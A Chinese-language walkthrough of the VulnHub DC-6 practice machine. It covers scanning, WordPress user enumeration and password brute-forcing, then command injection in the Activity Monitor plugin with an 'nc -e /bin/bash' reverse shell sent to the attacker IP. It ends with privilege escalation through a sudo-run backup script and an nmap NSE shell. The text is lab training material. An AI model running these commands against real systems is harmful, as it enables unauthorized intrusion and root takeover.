DC-6靶机

一.环境搭建

1.下载地址

靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

2.虚拟机配置

设置网络为nat模式,启动打开时,发现错误直接重试和点是

打开靶机虚拟机,如下图所示即为正常

二.开始渗透

1.信息收集

查找与攻击机(kali)同一网段的靶机ip

复制代码
arp-scan -l

可以看到靶机ip为192.168.111.134,攻击机(kali)ip 为192.168.111.128

用nmap查看开放端口以及开放服务

复制代码
nmap -p- -sV 192.168.111.134

开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件

复制代码
linux:
vim /etc/hosts
windows:
C:\Windows\System32\drivers\etc

添加如下的内容

复制代码
192.168.111.134 wordy

用浏览器打开,得到如下界面,以及提示是wordpress

用whatweb查看一下具体信息

复制代码
whatweb -v http://192.168.111.134

得知信息为word press和apache搭建的网站,用wpscan来扫描一下用户

复制代码
wpscan --url http://wordy/ --enumerate u

发现如下用户名

将其保存在usernames.txt中,方便后续爆破

看了大佬的wp,发现提示写在人家官网

DC: 6 ~ VulnHub

复制代码
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

对用户进行账号密码爆破

复制代码
wpscan --url http://wordy/ -U usernames.txt -P password.txt

显示有六个用户存粹是我多复制了一下,不用在意这个

2.登录后台

看到用户名mark/helpdesk01,进行账户登录

登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)

复制代码
http://wordy/wp-admin/

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

下面有利用方法

3.漏洞利用

漏洞利用地址如下

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

拼接如下命令

复制代码
baidu.com | nc -e /bin/bash 192.168.111.128 4444

在kali端开启监听

复制代码
nc -lvvp 4444

4.获取shell

得到如下shell

用python启一个交互式shell

复制代码
python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录下,发现提示

复制代码
cd /home/mark/stuff

进行ssh登录,graham/GSo7isUM1D4

复制代码
ssh [email protected]

5.进行提权

利用suid,发现没有可以利用的地方

查看当前用户可执行操作

复制代码
sudo -l

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

复制代码
cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

复制代码
echo "/bin/bash" >> /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

复制代码
echo "os.execute('/bin/bash')">/tmp/shell.nse

sudo nmap --script=/tmp/shell.nse

不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打

复制代码
cd /root
cat theflag.txt

最终成功获得root权限

相关推荐
mooyuan天天37 分钟前
upload-labs通关笔记-第2关 文件上传之MIME绕过
web安全·文件上传·文件上传漏洞·mime·upload-labs靶场
Johny_Zhao1 小时前
Ubuntu安装部署Zabbix网络监控平台和设备配置添加
linux·网络·mysql·网络安全·信息安全·云计算·apache·zabbix·shell·yum源·系统运维·itsm
mooyuan天天3 小时前
upload-labs通关笔记-第3关 文件上传之黑名单绕过
web安全·文件上传·文件上传漏洞·upload-labs靶场
优质网络系统领域创作者4 小时前
思科(Cisco ASA/Firepower)、华三(H3C)、华为(Huawei USG)防火墙 的基础配置
安全
AORO_BEIDOU4 小时前
防爆手机与普通手机有什么区别
人工智能·5g·安全·智能手机·信息与通信
码农飞哥4 小时前
互联网大厂Java求职面试实战:Spring Boot与微服务场景深度解析
java·数据库·spring boot·安全·微服务·消息队列·互联网医疗
~西贝贝~5 小时前
二元随机响应(Binary Randomized Response, RR)的翻转概率
网络安全
Bl_a_ck6 小时前
--openssl-legacy-provider is not allowed in NODE_OPTIONS 报错的处理方式
开发语言·前端·web安全·网络安全·前端框架·ssl
AORO_BEIDOU6 小时前
遨游5G-A防爆手机:赋能工业通信更快、更安全
5g·安全·智能手机
Waitccy6 小时前
Linux 系统安全基线检查:入侵防范测试标准与漏洞修复方法
linux·运维·网络·安全·系统安全·等保